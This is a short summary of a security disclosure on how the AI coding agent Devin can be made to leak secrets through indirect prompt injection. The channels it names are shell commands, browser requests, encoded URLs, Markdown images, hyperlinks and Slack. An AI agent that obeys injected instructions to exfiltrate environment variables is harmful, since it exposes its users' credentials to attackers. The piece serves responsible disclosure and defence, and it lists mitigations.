How Devin AI Can Leak Your Secrets via Multiple Means · Embrace The Red

Security researchers have detailed multiple methods for exfiltrating sensitive data from Devin, an AI-powered software development agent, through indirect prompt injection attacks. By exploiting Devin’s built-in Browser and Shell tools, attackers can trick the system into sending environment variables and other secrets to third-party servers via terminal commands, malicious web requests, or encoded URLs. Additional vectors include rendering Markdown images from untrusted domains, embedding hidden data in hyperlinks, and using Slack integrations for covert leaks. The vulnerabilities—reported to vendor Cognition in April 2025—remain unpatched, with researchers recommending restricted internet access by default, disabling untrusted content rendering, and implementing fine-grained access controls. The findings underscore the risk of over-reliance on AI agents to self-govern in hostile environments.